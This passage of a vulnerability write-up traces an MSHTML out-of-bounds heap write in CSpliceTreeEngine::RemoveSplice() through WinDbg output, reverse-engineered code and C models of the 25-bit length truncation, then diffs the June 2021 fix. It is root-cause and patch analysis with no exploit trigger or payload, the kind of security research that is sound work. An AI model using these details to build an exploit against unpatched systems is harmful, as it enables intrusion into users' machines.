63a467c6 e8c3fa1e00      call    MSHTML!ProcessHeapAlloc<0> (63c3628e)          ; the buffer is sized from the truncated text length
0:008:x86> p
eax=21d4e020 ebx=0508cb38 ecx=00d00006 edx=00000000 esi=0508ca08 edi=ffffffff
eip=63a467cb esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x4ab:
63a467cb 89465c          mov     dword ptr [esi+5Ch],eax ds:002b:0508ca64=00000000
0:008:x86> !heap -x eax
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
0000000021d4e018  0000000021d4e020  0000000000670000  0000000000670000    d01000         0       ffa  busy extra virtual
0:008:x86> g
Breakpoint 3 hit
eax=000002e4 ebx=0508cb38 ecx=04a849f0 edx=00000003 esi=0508ca08 edi=0000fdef
eip=63a468cf esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5af:
63a468cf 8b4920          mov     ecx,dword ptr [ecx+20h] ds:002b:04a84a10=1d02f020
0:008:x86> dd ecx lc    ; CTreeDataPos(Text)
04a849f0  000002e4 00000002 04aae564 04aae54c
04a84a00  04aae5ac 04aae5c4 00000041 00000000
04a84a10  1d02f020 8267ffff 00000000 00000000
0:008:x86> !heap -x 1d02f020
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
000000001d02f018  000000001d02f020  0000000000670000  0000000000670000   4d01000         0       ffa  busy extra virtual
0:008:x86> dd 1d02f020 l10  ; Tree::TextData object
1d02f020  00000002 0267ffff 002c002c 002c002c
1d02f030  002c002c 002c002c 002c002c 002c002c
1d02f040  002c002c 002c002c 002c002c 002c002c
1d02f050  002c002c 002c002c 002c002c 002c002c
0:008:x86> dd 1d02f020+0x2680000*2-0x10 l10
21d2f010  002c002c 002c002c 002c002c 002c002c
21d2f020  002c002c 0000002c 00000000 00000000
21d2f030  00000000 00000000 00000000 00000000
21d2f040  00000000 00000000 00000000 00000000
0:008:x86> p
eax=000002e4 ebx=0508cb38 ecx=1d02f020 edx=00000003 esi=0508ca08 edi=0000fdef
eip=63a468d2 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5b2:
63a468d2 8d442414        lea     eax,[esp+14h]
0:008:x86> p
eax=0508c7bc ebx=0508cb38 ecx=1d02f020 edx=00000003 esi=0508ca08 edi=0000fdef
eip=63a468d6 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5b6:
63a468d6 50              push    eax                                            ; address of the local that receives the actual text length
0:008:x86> p
eax=0508c7bc ebx=0508cb38 ecx=1d02f020 edx=00000003 esi=0508ca08 edi=0000fdef
eip=63a468d7 esp=0508c7a4 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5b7:
63a468d7 6a00            push    0                                              ; skip_cch: number of characters to skip
0:008:x86> p
eax=0508c7bc ebx=0508cb38 ecx=1d02f020 edx=00000003 esi=0508ca08 edi=0000fdef
eip=63a468d9 esp=0508c7a0 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5b9:
63a468d9 e890b1fbff      call    MSHTML!Tree::TextData::GetText (63a01a6e)     
0:008:x86> p
eax=1d02f028 ebx=0508cb38 ecx=1d02f020 edx=0508c7bc esi=0508ca08 edi=0000fdef
eip=63a468de esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5be:
63a468de 8b7c2414        mov     edi,dword ptr [esp+14h] ss:002b:0508c7bc=0267ffff
0:008:x86> dd eax-0x8 l10       ; return value points to the text string, at offset 8 in the Tree::TextData object
1d02f020  00000002 0267ffff 002c002c 002c002c
1d02f030  002c002c 002c002c 002c002c 002c002c
1d02f040  002c002c 002c002c 002c002c 002c002c
1d02f050  002c002c 002c002c 002c002c 002c002c
0:008:x86> dd 0508c7bc l1
0508c7bc  0267ffff              ; actual (untruncated) text length returned, 0x0267ffff = 40370176 - 1
0:008:x86> p
eax=1d02f028 ebx=0508cb38 ecx=1d02f020 edx=0508c7bc esi=0508ca08 edi=0267ffff
eip=63a468e2 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5c2:
63a468e2 8b4c2424        mov     ecx,dword ptr [esp+24h] ss:002b:0508c7cc=00000003
0:008:x86> p
eax=1d02f028 ebx=0508cb38 ecx=00000003 edx=0508c7bc esi=0508ca08 edi=0267ffff
eip=63a468e6 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5c6:
63a468e6 8b54241c        mov     edx,dword ptr [esp+1Ch] ss:002b:0508c7c4=00680003
0:008:x86> p
eax=1d02f028 ebx=0508cb38 ecx=00000003 edx=00680003 esi=0508ca08 edi=0267ffff
eip=63a468ea esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5ca:
63a468ea 57              push    edi                                            ; edi: source string length (untruncated)
0:008:x86> p
eax=1d02f028 ebx=0508cb38 ecx=00000003 edx=00680003 esi=0508ca08 edi=0267ffff
eip=63a468eb esp=0508c7a4 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5cb:
63a468eb 50              push    eax                                            ; eax: source string address
0:008:x86> p
eax=1d02f028 ebx=0508cb38 ecx=00000003 edx=00680003 esi=0508ca08 edi=0267ffff
eip=63a468ec esp=0508c7a0 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5cc:
63a468ec 8b465c          mov     eax,dword ptr [esi+5Ch] ds:002b:0508ca64=21d4e020
0:008:x86> p
eax=21d4e020 ebx=0508cb38 ecx=00000003 edx=00680003 esi=0508ca08 edi=0267ffff
eip=63a468ef esp=0508c7a0 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5cf:
63a468ef 2bd1            sub     edx,ecx                                        ; edx: destination size, based on the truncated length
0:008:x86> p
eax=21d4e020 ebx=0508cb38 ecx=00000003 edx=00680000 esi=0508ca08 edi=0267ffff
eip=63a468f1 esp=0508c7a0 ebp=0508c9f0 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5d1:
63a468f1 8d0c48          lea     ecx,[eax+ecx*2]                                ; ecx: destination address
0:008:x86> p
eax=21d4e020 ebx=0508cb38 ecx=21d4e026 edx=00680000 esi=0508ca08 edi=0267ffff
eip=63a468f4 esp=0508c7a0 ebp=0508c9f0 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5d4:
63a468f4 e8b8852500      call    MSHTML!wmemcpy_s (63c9eeb1)
0:008:x86> dd esp l2
0508c7a0  1d02f028 0267ffff
0:008:x86> p
Invalid parameter passed to C runtime function.
eax=00000022 ebx=0508cb38 ecx=8cccdfa3 edx=00000000 esi=0508ca08 edi=0267ffff
eip=63a468f9 esp=0508c7a0 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5d9:
63a468f9 8b4c2418        mov     ecx,dword ptr [esp+18h] ss:002b:0508c7b8=04a849f0
0:008:x86> g
(638.ad8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=21d4e020 ebx=0508cb38 ecx=04aae5c4 edx=02680002 esi=0508ca08 edi=0000fdef
eip=63a46809 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x4e9:
63a46809 66893c50        mov     word ptr [eax+edx*2],di  ds:002b:26a4e024=????     ; Crash
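The numbers in this session fit together as follows: the buffer is sized from cp values, which count the text run with its truncated 25-bit length, while the copy and the later writes use the untruncated length returned by Tree::TextData::GetText(). The sketch below replays that arithmetic with the values observed above. Two points are inferences from the register values rather than from the code: that the three characters stored before the text belong to <head>, </head> and <body>, and that the faulting index is the start offset plus the untruncated length (3 + 0x0267ffff = 0x02680002, which matches edx at the crash). The helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Values taken from the WinDbg session above. */
#define CP_HEAD       0x00000002u /* CTreePos::GetCp(_ptpSourceL = <head>)  */
#define CP_BODY_END   0x00680004u /* CTreePos::GetCp(_ptpSourceR = </body>) */
#define TEXT_CCH_REAL 0x0267ffffu /* Tree::TextData::_cch (untruncated)     */
#define CHARS_BEFORE  3u          /* destination offset of wmemcpy_s        */

/* Buffer size in wchar_t units, as computed by RemoveSplice(): 1 - cp(L) + cp(R). */
static uint32_t splice_buffer_cch(uint32_t cp_l, uint32_t cp_r)
{
    return 1u - cp_l + cp_r;  /* unsigned wrap-around gives the intended result */
}

/* wmemcpy_s-style bounds check: count units must fit into dest_cch units. */
static int copy_fits(uint32_t dest_cch, uint32_t count)
{
    return count <= dest_cch;
}

/* Index of the next write if the position advances by the real text length. */
static uint32_t next_write_index(uint32_t chars_before, uint32_t text_cch)
{
    return chars_before + text_cch;
}
```

The failed wmemcpy_s (eax = 0x22, i.e. ERANGE) does not stop the function; the later write at index 0x02680002 lands roughly 0x4000000 bytes past the end of the 0xd00006-byte buffer.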

Key parts of the vulnerable function CSpliceTreeEngine::RemoveSplice() (reverse-engineered):

HRESULT __thiscall CSpliceTreeEngine::RemoveSplice(CSpliceTreeEngine *this)
{
    // Initial DOM stream: _ptpSourceL = <head>, _ptpSourceR = CTreeDataPos(Pointer,04b152f0)
    // <ROOT> -> <html> -> CTreeDataPos(Pointer,04b15320) -> <head> -> </head> -> <body> -> CTreeDataPos(Text,04b151a0) 
    // -> </body> -> CTreeDataPos(Pointer,04b152f0) -> </html> -> </ROOT>
    ...
    // pSpliceAnchor._pTreePos = _ptpSourceL->_pLeft
    // DOM stream after the first CSpliceTreeEngine::CSpliceAnchor::AnchorAt() call
    // <ROOT> -> <html> -> CTreeDataPos(Pointer,04b15320) ->CTreeDataPos(Pointer,04b15350) -> <head> -> </head> -> <body> 
    // -> CTreeDataPos(Text,04b151a0) -> </body> -> CTreeDataPos(Pointer,04b152f0) -> </html> -> </ROOT>
    hr1 = CSpliceTreeEngine::CSpliceAnchor::AnchorAt(&pSpliceAnchorL, ptpSourceL, 1, 0);
    // pSpliceAnchor1._pTreePos = _ptpSourceR->_pRight
    // DOM stream after the second CSpliceTreeEngine::CSpliceAnchor::AnchorAt() call
    // <ROOT> -> <html> -> CTreeDataPos(Pointer,04b15320) ->CTreeDataPos(Pointer,04b15350) -> <head> -> </head> -> <body> 
    // -> CTreeDataPos(Text,04b151a0) -> </body> -> CTreeDataPos(Pointer,04b152f0) -> CTreeDataPos(Pointer,04b15380) -> </html> -> </ROOT>
    if ( hr1 || (hr1 = CSpliceTreeEngine::CSpliceAnchor::AnchorAt(&pSpliceAnchorR, this->_ptpSourceR, 0, 1)) != 0 )// not satisfied
    {
LABEL_156:
        hr = hr1;
        goto LABEL_157;
    }
    // _ptpSourceL != _ptpSourceR->NextTreePos()
    if ( this->_ptpSourceR->_pRight != this->_ptpSourceL )// must be satisfied (CSpliceTreeEngine, CTreePos)
    {
        ...
        if ( HIBYTE(v179) && (this->field_54 & 4) != 0 )// CSpliceTreeEngine,CMarkUp,this->field_54=0x4
        {
            ptpSourceL_cchLeft = 1 - CTreePos::GetCp(this->_ptpSourceL);// 1-2=-1,_ptpSourceL(<head>)
            ptpSourceR_cchLeft = CTreePos::GetCp(this->_ptpSourceR);// 0x00680005,_ptpSourceR(CTreeDataPos(Pointer,04b152f0))
            ptpSourceR = this->_ptpSourceR;
            fNotText = (ptpSourceR->_cElemLeftAndFlags & 4) == 0;
            ptpSourceR_to_ptpSourceL_cch = ptpSourceL_cchLeft + ptpSourceR_cchLeft;
            if ( !fNotText )                          // fNotText = True
            {
                TextLength = CTreeDataPos::GetTextLength(ptpSourceR);
                ptpSourceR_to_ptpSourceL_cch = TextLength + ptpSourceR_to_ptpSourceL_cch - 1;
            }
            LOBYTE(ptpSourceR) = HIBYTE(v179);        // ptpSourceR = v179 = 1
            v11 = cch;                                // v173 = 0
        }
        ...
        if ( ptpSourceR )                           // must be satisfied
        {
            if ( (this->field_54 & 4) != 0 )
            {
                ptpSourceL_cchLeft = 1 - CTreePos::GetCp(this->_ptpSourceL);// 1-2=-1,_ptpSourceL(<head>)
                ptpSourceR_cchLeft = CTreePos::GetCp(this->_ptpSourceR);// 0x00680005,_ptpSourceR(CTreeDataPos(Pointer,04b152f0))
                ptpSourceR = this->_ptpSourceR;
                fNotText = (ptpSourceR->_cElemLeftAndFlags & 4) == 0;
                ptpSourceR_to_ptpSourceL_cch1 = ptpSourceL_cchLeft + ptpSourceR_cchLeft;//CTreePos,Cp
                if ( !fNotText )
                {
                    TextLength = CTreeDataPos::GetTextLength(ptpSourceR);
                    ptpSourceR_to_ptpSourceL_cch1 = TextLength + ptpSourceR_to_ptpSourceL_cch1 - 1;
                }
            }
        }
        ...
    }
    ...
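    // Remove pointers with cling at the boundaries, so that _ptpSourceL/R can be repositioned at non-pointer positions. We do this so that elements can make selections in the exit-tree notifications.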
    while ( 1 )
    {
        ptpSourceL = this->_ptpSourceL;             // _ptpSourceL(<head>)
        // Pointer=0x8,_ptpSourceL->IsPointer()
        if ( (ptpSourceL->_cElemLeftAndFlags & 8) == 0 || ptpSourceL == this->_ptpSourceR )// ? must be satisfied, CTreePos
            break;  // _ptpSourceL(<head>), the loop exits here
        // _ptpSourceL->NextTreePos()
        ptpSourceL_Right = ptpSourceL->_pRight;
        if ( (ptpSourceL->dptp.p._dwPointerAndGravityAndCling & 2) != 0 )// Cling = 0x2
            Tree::TreeWriter::Remove(ptpSourceL, &this->_pMarkupSource->_tpRoot, &this->_pMarkupSource->_ptpFirst);
        this->_ptpSourceL = ptpSourceL_Right;
    }
    while ( 1 )
    {
        ptpSourceR = this->_ptpSourceR;             // _ptpSourceR(CTreeDataPos(Pointer,04b152f0))
        if ( (ptpSourceR->_cElemLeftAndFlags & 8) == 0 || this->_ptpSourceL == ptpSourceR )// ? must be satisfied, CTreePos
            break;
        // _ptpSourceR->PreviousTreePos()
        ptpSourceR_Left = ptpSourceR->_pLeft;
        if ( (ptpSourceR->dptp.p._dwPointerAndGravityAndCling & 2) != 0 )// Cling = 0x2
            Tree::TreeWriter::Remove(ptpSourceR, &this->_pMarkupSource->_tpRoot, &this->_pMarkupSource->_ptpFirst);
        this->_ptpSourceR = ptpSourceR_Left;    // _ptpSourceR is modified here and ends up as _ptpSourceR(</body>)
    }
    ...
    if ( (ptpSourceR->_cElemLeftAndFlags & 4) == 0// ptpSourceR(</body>)
        || ptpSourceR == this->_ptpSourceL
        || (hr = CSpliceTreeEngine::CSpliceAnchor::AnchorAt(&pSpliceAnchor, ptpSourceR, 1, 1), (hr1 = hr) == 0) )// ? must be satisfied, CTreePos
    {
        ...
        while ( 1 )
        {
            Cch = 0;
            if ( HIBYTE(v179) && (this->field_54 & 4) != 0 )// ? must be satisfied
            {
                ptpSourceL_cchLeft = 1 - CTreePos::GetCp(this->_ptpSourceL);// 1-2=-1,_ptpSourceL(<head>)
                // ptpSourceR: truncated text length (orig_sz & 0x1ffffff); the _cch member of the DATAPOSTEXT struct in CTreeDataPos that stores the text length has only 25 bits
                ptpSourceR_cchLeft = CTreePos::GetCp(this->_ptpSourceR);// 0x00680004,_ptpSourceR(</body>)
                ptpSourceR = this->_ptpSourceR;
                ptpSourceR_to_ptpSourceL_cch2 = ptpSourceL_cchLeft + ptpSourceR_cchLeft;
                fNotText = (ptpSourceR->_cElemLeftAndFlags & 4) == 0;// Text=0x4
                ptpSourceR_to_ptpSourceL_cch2 = ptpSourceL_cchLeft + ptpSourceR_cchLeft;
                if ( !fNotText )                        // only taken for text data; not required, CTreePos
                {
                    TextLength = CTreeDataPos::GetTextLength(ptpSourceR);
                    ptpSourceR_to_ptpSourceL_cch2 = TextLength + ptpSourceR_to_ptpSourceL_cch2 - 1;
                }
                // ptpSourceR_to_ptpSourceL_cch = 0x00680004 = 1-2+0x00680005
                // ptpSourceR_to_ptpSourceL_cch1 = 0x00680004 = 1-2+0x00680005
                if ( ptpSourceR_to_ptpSourceL_cch > ptpSourceR_to_ptpSourceL_cch1 )// ? not satisfied, v192(CTreePos), v194(CTreePos)
                {
                    ...
                }
                else
                {
                    pUndoChRecord = operator new[](2 * ptpSourceR_to_ptpSourceL_cch2);// g_hProcessHeap
                    this->_pUndoChRecord = pUndoChRecord;
                    if ( pUndoChRecord )                  // ? must be satisfied, CSpliceTreeEngine
                    {
                        ptpSourceR = this->_ptpSourceR; // _ptpSourceR(</body>)
                        ptpSourceL = this->_ptpSourceL; // _ptpSourceL(<head>)
                        for ( ptp = ptpSourceL; ptp != ptpSourceR->_pRight; ptp = ptp->_pRight )// ? must be satisfied, CTreePos
                        {
                            // <head> -> </head> -> <body> -> CTreeDataPos(Text,04b151a0) -> </body>
                            ptp_cElemLeftAndFlags = ptp->_cElemLeftAndFlags;
                            if ( (ptp_cElemLeftAndFlags & 4) != 0 )// ? must be satisfied, CTreePos, Text=0x4
                            {
                                // Untruncated text length: the _cch of the Tree::TextData object pointed to by CTreeDataPos::_pTextData, stored in 32 bits
                                pText = Tree::TextData::GetText(ptp->_pTextData, 0, &TextLen);
                                // The copy itself is bounded by the buffer size (ptpSourceR_to_ptpSourceL_cch2 wide characters in total)
                                wmemcpy_s(&this->_pUndoChRecord[Cch], ptpSourceR_to_ptpSourceL_cch2 - Cch, pText, TextLen);
                                Cch += TextLen; // the untruncated text length is used for indexing below
                            }
                            // BOOL IsNode() const { return TestFlag(NodeBeg|NodeEnd); },NodeBeg=0x1,NodeEnd=0x2
                            // BOOL IsEdgeScope() const { return TestFlag(TPF_EDGE); },TPF_EDGE=0x40
                            // BOOL IsData2Pos() const { return TestFlag(TPF_DATA2_POS); },TPF_DATA2_POS=0x40
                            else if ( (ptp_cElemLeftAndFlags & 3) != 0 && (ptp_cElemLeftAndFlags & 0x40) != 0 )// ? must be satisfied, CTreePos
                            {
                                this->_pUndoChRecord[Cch++] = 0xFDEF;   // Crash: the written value cannot be controlled, but the write position can
                            }
                        }
                    }
                    else
                    {
                        ...
                    }
                }
            }
            ...
        }
        ...
    }
    ...
}

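The root cause of the out-of-bounds heap write is that the CTreeDataPos object, which marks the position of a text string in the DOM tree/DOM stream, records the string's length in two places: the _cch member of the DATAPOSTEXT structure (25 bits) and the _cch member of the Tree::TextData object (32 bits). Because the two fields differ in width, once the string is longer than 25 bits can represent, the value assigned to DATAPOSTEXT::_cch is a truncated length. Later, when CSpliceTreeEngine::RemoveSplice() removes the DOM tree/DOM stream structures that contain the string, it calls CTreePos::GetCp() to compute the number of characters those structures occupy (which includes the truncated text length) and allocates a buffer of that size. It then calls Tree::TextData::GetText() to obtain the untruncated length stored in Tree::TextData::_cch and uses it as the index when writing into that buffer, which results in an out-of-bounds heap write.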
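To make the size mismatch concrete, the following is a minimal C sketch, not mshtml code, that models only the index arithmetic of the copy loop in CSpliceTreeEngine::RemoveSplice(). As a simplifying assumption, every node position counts as one character toward the buffer size and writes one 0xFDEF marker; pointer positions and the bounded wmemcpy_s() copy are not modeled. The type Pos and the functions alloc_cch(), last_write_index() and overflows() are hypothetical names introduced for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified, hypothetical model of the RemoveSplice() copy loop. */
#define DPT_CCH_MASK 0x1FFFFFFu   /* DATAPOSTEXT::_cch keeps only 25 bits */
static_assert(DPT_CCH_MASK == (1u << 25) - 1u, "25-bit length field");

typedef struct {
    int      is_text;   /* 1 = text run, 0 = node edge */
    uint32_t text_len;  /* full length, as in Tree::TextData::_cch (32 bits) */
} Pos;

/* Buffer size in wide chars, derived from GetCp(): uses truncated lengths. */
static uint64_t alloc_cch(const Pos *p, size_t n) {
    uint64_t total = 0;
    for (size_t i = 0; i < n; i++)
        total += p[i].is_text ? (p[i].text_len & DPT_CCH_MASK) : 1;
    return total;
}

/* Index of the last 0xFDEF store; Cch advances by the untruncated length.
   Returns -1 if no marker would be written. */
static int64_t last_write_index(const Pos *p, size_t n) {
    uint64_t cch = 0;
    int64_t last = -1;
    for (size_t i = 0; i < n; i++) {
        if (p[i].is_text) {
            cch += p[i].text_len;        /* Cch += TextLen */
        } else {
            last = (int64_t)cch;         /* _pUndoChRecord[Cch++] = 0xFDEF */
            cch++;
        }
    }
    return last;
}

/* Nonzero if the modeled loop would write past the allocated buffer. */
static int overflows(const Pos *p, size_t n) {
    int64_t last = last_write_index(p, n);
    return last >= 0 && (uint64_t)last >= alloc_cch(p, n);
}
```

For example, modeling <head> -> </head> -> <body> -> text -> </body> with a 0x2000010-character text run gives a buffer of 4 + 0x10 = 20 wide characters, while the final 0xFDEF store lands at index 3 + 0x2000010 = 0x2000013. With a 0x10-character text run, the last store is at index 19 and stays inside the buffer.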

 

Vulnerability Fix

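The analysis above was performed on Windows 10 1809 Pro x64. The MSRC advisory page for this vulnerability lists KB5003646 as the patch for this environment, but the patch details page states that it applies only to LTSC editions, and indeed it fails to install here. I therefore installed and analyzed the patch on Windows 10 Enterprise LTSC 2019, using the release from March 2019. To install the patch successfully, a servicing stack update (SSU) released on or after May 11, 2021 must be installed first. I installed KB5003711, after which KB5003646 installed without problems.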

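KB5003646 is a cumulative update released on June 8, 2021. If the two module files being diffed come from environments whose update dates are far apart, the changes related to this fix are hard to pinpoint among all the others. We therefore need the number of the cumulative update released in May 2021, which can be found in the information on the KB5003646 details page of the Microsoft Update Catalog.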

The mshtml.dll versions corresponding to KB5003171 and KB5003646 are:

Update       mshtml.dll version
KB5003171    11.0.17763.1911
KB5003646    11.0.17763.1999

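Next, we extract mshtml.dll from both patched environments, open each in IDA to generate an IDB file, and then diff the two with BinDiff. Different IDA and BinDiff versions may be incompatible with each other; I used IDA Pro 7.5 with BinDiff 6. The analysis produces the following result: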

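From the root-cause analysis above, we know that this vulnerability is related to text strings. Among the functions BinDiff reports as changed, only Tree::TreeWriter::NewTextPosInternal() and CTreeDataPos::GetPlainTextLength() deal with text strings. Static analysis of both functions in IDA shows that the patch is located in Tree::TreeWriter::NewTextPosInternal(). CTreeDataPos::GetPlainTextLength() calls Tree::TextData::GetText(), and the reversed Tree::TextData::GetText() code shown earlier shows that this function returns the pointer and length of the text string stored in the Tree::TextData object. The _cch member of Tree::TextData, which stores the string length, is 32 bits wide, whereas the _cch member of the DATAPOSTEXT structure in CTreeDataPos, which also stores the string length, is only 25 bits wide. If the length exceeds the range of 25 bits, it is truncated when stored into DATAPOSTEXT::_cch. The patch should therefore validate the string length at the point where it is written to DATAPOSTEXT::_cch, which rules out CTreeDataPos::GetPlainTextLength() as the patch location.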
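The truncation can be reproduced with the packing expression that the decompiled Tree::TreeWriter::NewTextPosInternal() uses for _sid_cch (SrcTextCch & 0x1FFFFFF | (sid << 25)). The C sketch below assumes, based only on that expression, that bits 0 to 24 hold the length and bits 25 to 31 hold sid; pack_sid_cch(), unpack_cch() and unpack_sid() are hypothetical helper names, not mshtml functions.

```c
#include <assert.h>
#include <stdint.h>

/* Layout assumed from the decompiled expression
   SrcTextCch & 0x1FFFFFF | (sid << 25):
     bits 0..24  -> text length (_cch)
     bits 25..31 -> sid (only its low 7 bits fit)                    */
#define DPT_CCH_MASK 0x1FFFFFFu
static_assert(DPT_CCH_MASK == (1u << 25) - 1u, "length field is 25 bits wide");

/* Same expression as the unpatched code: the high bits of cch are dropped. */
static uint32_t pack_sid_cch(uint32_t cch, uint8_t sid) {
    return (cch & DPT_CCH_MASK) | ((uint32_t)sid << 25);
}

/* Read back the stored (possibly truncated) length. */
static uint32_t unpack_cch(uint32_t sid_cch) { return sid_cch & DPT_CCH_MASK; }

/* Read back the stored sid bits. */
static uint8_t unpack_sid(uint32_t sid_cch) { return (uint8_t)(sid_cch >> 25); }
```

With this layout, a length of 0x2000010 is stored as 0x10, while Tree::TextData::_cch still holds the full 0x2000010; the largest length that survives packing unchanged is 0x1FFFFFF.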

The figure below shows the patch code added to Tree::TreeWriter::NewTextPosInternal():

Below is the cleaned-up IDA decompilation of Tree::TreeWriter::NewTextPosInternal() before and after the patch:

// Before the patch:
void __fastcall Tree::TreeWriter::NewTextPosInternal(CTreeDataPos **ppTreeDataPos, const wchar_t *SrcTextPtr, ULONG SrcTextCch, const CTreePos *a4, enum htmlLayoutMode eHLM, BYTE sid, LONG lTextID, int a8, bool a9)
{
  CTreeDataPos *pTreeDataPos; // ecx

  pTreeDataPos = *ppTreeDataPos;
  pTreeDataPos->_cElemLeftAndFlags = pTreeDataPos->_cElemLeftAndFlags & 0xFFFFFFF4 | 4;
  if ( a9 )
    pTreeDataPos->dptp.t._lTextID |= 0x20000000u;
  pTreeDataPos->dptp.t._sid_cch = SrcTextCch & 0x1FFFFFF | (sid << 25);
  if ( eHLM < 80000 )
    pTreeDataPos->dptp.t._lTextID = lTextID;
  else
    pTreeDataPos->dptp.t._lTextID = (a9 << 29) | ((a8 << 30) | lTextID & 0x1FFFFFFF) & 0xDFFFFFFF;
  pTreeDataPos->_ulRefs_Flags = pTreeDataPos->_ulRefs_Flags & 0xFFFFFFF7 | 3;
  CTreeDataPos::UpdateWhiteSpaceTypeConsideringNewText(pTreeDataPos, SrcTextPtr, SrcTextCch);
}

// After the patch:
void __fastcall Tree::TreeWriter::NewTextPosInternal(CTreeDataPos **ppTreeDataPos, const wchar_t *SrcTextPtr, ULONG SrcTextCch, const CTreePos *a4, enum htmlLayoutMode eHLM, BYTE sid, LONG lTextID, int a8, bool a9)
{
  CTreeDataPos *pTreeDataPos; // esi

  pTreeDataPos = *ppTreeDataPos;
  (*ppTreeDataPos)->_cElemLeftAndFlags = (*ppTreeDataPos)->_cElemLeftAndFlags & 0xFFFFFFF4 | 4;
  if ( a9 )
    pTreeDataPos->dptp.t._lTextID |= 0x20000000u;
  if ( (unsigned __int8)wil::Feature<__WilFeatureTraits_Feature_Servicing_2106b_33613045>::__private_IsEnabled() )
    Release_Assert((int)SrcTextCch < 0x2000000);
  pTreeDataPos->dptp.t._sid_cch = SrcTextCch & 0x1FFFFFF | (sid << 25);
  if ( eHLM >= 80000 )
    pTreeDataPos->dptp.t._lTextID = (a9 << 29) | ((a8 << 30) | lTextID & 0x1FFFFFFF) & 0xDFFFFFFF;
  else
    pTreeDataPos->dptp.t._lTextID = lTextID;
  pTreeDataPos->_ulRefs_Flags = pTreeDataPos->_ulRefs_Flags & 0xFFFFFFF7 | 3;
  CTreeDataPos::UpdateWhiteSpaceTypeConsideringNewText(pTreeDataPos, SrcTextPtr, SrcTextCch);
}
void __fastcall Release_Assert(bool a1)
{
  if ( !a1 )
    Abandonment::AssertionFailed();             // assertion failed
}
void __stdcall Abandonment::AssertionFailed()
{
  void *retaddr; // [esp+4h] [ebp+4h]

  Abandonment::InduceAbandonment(10, retaddr, 0, 0);
  __debugbreak();
}
void __thiscall Abandonment::InduceAbandonment(void *this, int a2, int a3)
{
  Abandonment::hostExceptionFilter = SetUnhandledExceptionFilter(0);
  RaiseException(0x80000003, 1u, this, 0);
}

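The patched Tree::TreeWriter::NewTextPosInternal() performs a check before writing the string length into the _cch member of the DATAPOSTEXT structure in CTreeDataPos (when the WIL feature flag tested by wil::Feature<...>::__private_IsEnabled() is enabled): unless SrcTextCch < 0x2000000, that is, unless the length fits in 25 bits, the assertion fails. A standard assert() is only active in debug builds and is compiled out of release builds, so the patch uses Release_Assert(), an assertion helper that remains active in release builds. When the assertion fails, Abandonment::InduceAbandonment() calls SetUnhandledExceptionFilter(NULL) to clear the current top-level exception filter (saving the previous one in Abandonment::hostExceptionFilter) and then uses RaiseException() to raise a non-continuable breakpoint exception (0x80000003). Control passes to exception handling, so IE never reaches the code that performs the out-of-bounds heap write.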
